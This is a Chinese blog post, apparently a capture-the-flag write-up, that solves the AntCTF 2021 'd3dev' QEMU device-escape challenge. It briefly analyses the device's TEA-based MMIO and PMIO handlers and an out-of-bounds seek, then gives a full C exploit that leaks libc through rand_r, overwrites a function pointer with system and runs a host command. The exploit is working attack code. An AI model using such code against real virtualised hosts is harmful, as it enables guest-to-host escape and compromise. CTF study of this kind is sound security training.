AntCTF 2021 d3dev

最新推荐文章于 2022-04-10 12:24:26 发布
最新推荐文章于 2022-04-10 12:24:26 发布
阅读量241 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/122571579
版权

在这里插入图片描述
绿

在这里插入图片描述
设备叫d3dev

在这里插入图片描述
两个id
在这里插入图片描述
在这里插入图片描述
一个mmio 一个pmio

在这里插入图片描述
结构体

在这里插入图片描述

看起来像tea

#define DELTA 0x9e3779b9

void tea_encrypt(unsigned int* v, unsigned int* key) {
  unsigned int l = v[0], r = v[1], sum = 0;
  for (size_t i = 0; i < 32; i++) { //进行32次迭代加密,Tea算法作者的建议迭代次数
    l += (((r << 4) ^ (r >> 5)) + r) ^ (sum + key[sum & 3]);
    sum += DELTA; //累加Delta的值
    r += (((l << 4) ^ (l >> 5)) + l) ^ (sum + key[(sum >> 11) & 3]); //利用多次双位移和异或将明文与密钥扩散混乱,并将两个明文互相加密
  }
  v[0] = l;
  v[1] = r;
}

//利用可逆性将加密过程逆转
void tea_decrypt(unsigned int* v, unsigned int* key) {
  unsigned int l = v[0], r = v[1], sum = 0;
  sum = DELTA * 32; //32次迭代累加后delta的值
  for (size_t i = 0; i < 32; i++) {
    r -= (((l << 4) ^ (l >> 5)) + l) ^ (sum + key[(sum >> 11) & 3]);
    sum -= DELTA;
    l -= (((r << 4) ^ (r >> 5)) + r) ^ (sum + key[sum & 3]);
  }
  v[0] = l;
  v[1] = r;
}

所以看起来它干的事情就是用tea算法解密指定位置上的内容。

mmio_write
在这里插入图片描述
也有tea
看起来就是把指定位置的数拿出来tea加密一下再写回去

pmio_read
在这里插入图片描述
看起来比较玄乎
在这里插入图片描述看一下汇编就会比较清晰
简答说就是我们可以把四个key读出来。

pmio_write
在这里插入图片描述
可以设置seek来导致越界

可以执行rand_r函数

思路还是比较简单的
就是利用越界读写,读出rand_r的地址,从而拿到libc,然后再把system写进去
就可以了

exp

#include <stdio.h>
#include <unistd.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/io.h>
#include <sys/ioctl.h>
#include <sys/io.h>

#define _DWORD uint32_t
#define LODWORD(x) (*((_DWORD *)&(x)))


//cat /sys/devices/pci0000\:00/0000\:00\:03.0/resource0
uint32_t mmio_addr = 0xfebf1000;
uint32_t mmio_size = 0x800;
size_t port_addr = 0xc040;
u_int32_t key[4];

unsigned char* mmio_mem;

void die(const char* msg)
{
    perror(msg);
    exit(-1);
}

void* mem_map( const char* dev, size_t offset, size_t size )
{
    int fd = open( dev, O_RDWR | O_SYNC );
    if ( fd == -1 ) {
        return 0;
    }

    void* result = mmap( NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, offset );

    if ( !result ) {
        return 0;
    }

    close( fd );
    return result;
}

uint64_t mmio_read(uint64_t addr)
{
    return *((uint8_t*) (mmio_mem+addr));
}

void mmio_write(uint64_t addr, uint64_t value)
{
    *( (uint64_t *) (mmio_mem+addr) ) = value;
}

void pmio_write(size_t port, u_int32_t val)
{
    outl(val, port_addr + port);
}

size_t pmio_read(size_t port)
{
    return inl(port_addr + port);
}

size_t tea(size_t m)
{
    uint64_t v3;
    signed int v4;   // esi
    unsigned int v5; // ecx
    uint64_t result; // rax

    v3 = m;
    v4 = -957401312;
    v5 = v3;
    result = v3 >> 32;
    do
    {
        LODWORD(result) = result - ((v5 + v4) ^ (key[3] + (v5 >> 5)) ^ (key[2] + 16 * v5));
        v5 -= (result + v4) ^ (key[1] + ((unsigned int)result >> 5)) ^ (key[0] + 16 * result);
        v4 += 1640531527;
    } while (v4);

    printf("0x%lx\n", v5);
    printf("0x%lx\n", result);
    return result << 32 | (u_int64_t)v5;
}

int main()
{
    system( "mknod -m 660 /dev/mem c 1 1" );
    mmio_mem = mem_map( "/dev/mem", mmio_addr, mmio_size );
    if ( !mmio_mem ) {
        die("mmap mmio failed");
    }

    if (iopl(3) != 0)
    {
        puts("iopl fail!");
        exit(-1);
    }

    pmio_write(8, 0x100);
    mmio_write(8, 0);
    mmio_write(0x18, 0);
    u_int32_t tmp;
    u_int64_t rand_addr;
    u_int64_t libc_base, system_addr;
    rand_addr = mmio_read(0x18);
    rand_addr += ((u_int64_t)mmio_read(0x18)) << 32;

    libc_base = rand_addr - 0x59630;
    system_addr = libc_base + 0x76890;
    printf("libc 0x%llx\n", libc_base);

    key[0] = pmio_read(12);
    key[1] = pmio_read(16);
    key[2] = pmio_read(20);
    key[3] = pmio_read(24);
    u_int64_t t = tea(system_addr);

    mmio_write(0x18, t & 0xffffffff);
    mmio_write(0x18, t >> 32);
   
    char *payload = "cat flag";
    tmp = tmp = *((u_int32_t *)payload + 1);
    
    pmio_write(8, 0);
    mmio_write(0, tmp);
    tmp = *(u_int32_t *)payload;
    printf("0x%lx", tmp);
    pmio_write(28, tmp);
    return 0;
}
yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Anciety 0CTF/TCTF 2018 总结
jmp esp
04-02 2549
前言 这次跟着lotus-r3kapig打0CTF,题目挺好,学到很多东西,无奈最后实在是菜,题目要么被队友秒了,要么完全不知道怎么下手,确实很有总结的必要。 Time based DAY 1 第一天比较操蛋是我们除了0ctf还有个nuit du ctf要打,两个时间是重合的,比较尴尬,还好nuit du ctf只有一天,难度也还比较有限,加之队友实在给力(感谢@F0r_1st 和...
2022-03-09
m0_57291352的博客
03-09 370
d3factor (来源:AntCTF & Dˆ3CTF 2022) from Crypto.Util.number import bytes_to_long, getPrime from secret import msg from sympy import nextprime from gmpy2 import invert from hashlib import md5 flag = 'd3ctf{'+md5(msg).hexdigest()+'}' p = getPrime(256) q
2021 AntCTF&D3CTF之jumpjump
qq_43682582的博客
03-08 417
AntCTF&D3CTF之jumpjump前言正题后记 前言 其他的都太难惹。。。 正题 Ida打开,shift+F12查看字符串: 跟进后来到关键函数,F5大法查看伪代码: 通过分析,有两个关键函数,sub_40189D()和sub_40191E(),第一个函数: 继续跟进: for循环里的就是第一轮异或,后面的sub_408A80()函数经过动态调试发现为反调试手段, 只要不进入该函数,直接F9到下一个断点前即可继续运行程序。 第二个函数: 将第一轮异或后的值加4之后与0x33异或,再与
Ant x D^3 CTF Official Writeup.pdf
03-22
Ant x D^3 CTF Official Writeup.pdf
ant脚本通用模板 ant脚本通用模板
03-22
ant脚本通用模板ant脚本通用模板ant脚本通用模板ant脚本通用模板ant脚本通用模板
记一个ctf赛题技巧
蚁景网安学院
03-02 1452
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析稿件通过并发布还能收获200-800元不等的...
D3CTF2021-d3dev
最新发布
11-05
附件
d3d11renderers.rar
07-31
《深入解析D3D11渲染器:C++实践篇》 Direct3D 11(简称D3D11)是微软推出的一种强大的图形应用程序接口(API),用于开发高性能的3D图形应用,广泛应用于游戏开发、可视化设计等领域。在C++中,D3D11提供了一套...
Vue2 D3.js demo
03-03
Vue2 D3.js Demo是一个结合了Vue2框架与D3.js数据可视化库的示例项目。这个项目旨在展示如何在Vue2应用中有效地利用D3.js来创建动态、交互式的图表和数据可视化组件。Vue2是一款轻量级的前端JavaScript框架,以其...
d3.js框架离线引用包
04-26
**d3.js框架离线引用包** d3.js(Data-Driven Documents)是一个强大的JavaScript库,主要用于创建数据驱动的Web图形。它由Mike Bostock开发,被广泛应用于数据可视化,尤其是在网页和交互式应用程序中。这个“d3....
d3js流程图代码
04-09
**D3.js 流程图代码详解** D3.js(Data-Driven Documents)是一个强大的JavaScript库,用于在浏览器中操作和展示数据。它利用SVG、Canvas或HTML来创建交互式的、基于数据的可视化。在这个“d3js流程图代码”项目中...
CTF题目记录3(二次编码,反序列化)
kkzzjx
05-15 1803
miniL被虐了QAQ太菜惹555 有精通php反序列化的旁友可以暗搓搓交换下思路 PHP2 (攻防世界) Can you anthenticate to this website? 其他什么都没有 index.phps源码泄露(记在小本本上,Phps是php的源码) 好脑洞 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_G
两种CTF中特殊盲注的总结
蚁景网安学院
02-04 931
知识点实操概要MySQL注入中,3种盲注方式:基于布尔的盲注、基于时间的盲注、基于报错的盲注。以此掌握盲注原理!链接指路:https://www.hetianlab.com/expc.do...
AntCTF X D^3CTF shellgen2 题解
CODER的博客
03-20 479
文章目录1. 前言2. 题目描述3. 暴力的算法4. 优化思想4.1 节省变量个数4.2 Array中剩下的字母r、y怎么用起来4.3 变量名只能一堆下划线吗4.4 变量名怎么分配5. 编写代码6. 测试样例7. 后记 1. 前言 本题是一个misc题目,但其中涉及了一些PHP的知识,巧妙的用到了一些算法,笔者将分析本题的设计思想,并给出一个“较”完美的算法。 先来看题目,我们需要给一个php写的webshell,题目会输入一串随机小写字母串,如字符串S:skadkehqasbjkaskad,运行该webs
one_gadget 下载 安装 与使用
yongbaoii的博客
10-15 7967
00 开始 当有了ROP_gadget之后就会发现one_gadget也是必须的。 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职。 01 安装 sudo apt -y install ruby sudo gem install one_gadget 02 使用 举个栗子 还是挺简单的。 ...
go pwn 2022 虎符 gogogo
yongbaoii的博客
04-09 6976
刚刚看了17年seccon的baby_stack 看着这个感觉好亲切。
linux 安装codeql环境 (二)codeql database create通过报错分析其流程
yongbaoii的博客
04-10 5820
尝试过很多解决方案之后无果 决定研究一下它的整个流程
解决LibcSearcher找不到合适libc(更新libc)
yongbaoii的博客
02-09 5324
1 尝试直接更新 进入LibcSearcher/libc-database中运行./get文件即可进行更新。 可能./get更新不了。 2 究极更新 cd LibcSearcher rm -rf libc-database git clone https://github.com/niklasb/libc-database.git 然后进入libc-database执行./get 可能会这样提醒。 那么就看需要点啥更新点啥,一般是 ./get ubuntu #一般pwn题环境就Ubuntu,所以有第一个
linux 安装codeql环境 (一)基本环境搭建
yongbaoii的博客
04-10 5045
cccccccodeql
d3d9 和d3d11
05-30
d3d9和d3d11都是Direct3D的版本。Direct3D是Microsoft Windows操作系统中的一个3D图形API,用于在计算机上呈现3D图形。它是DirectX API的一部分,用于与显卡交互以呈现图形。 d3d9是Direct3D 9的缩写,是DirectX 9...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值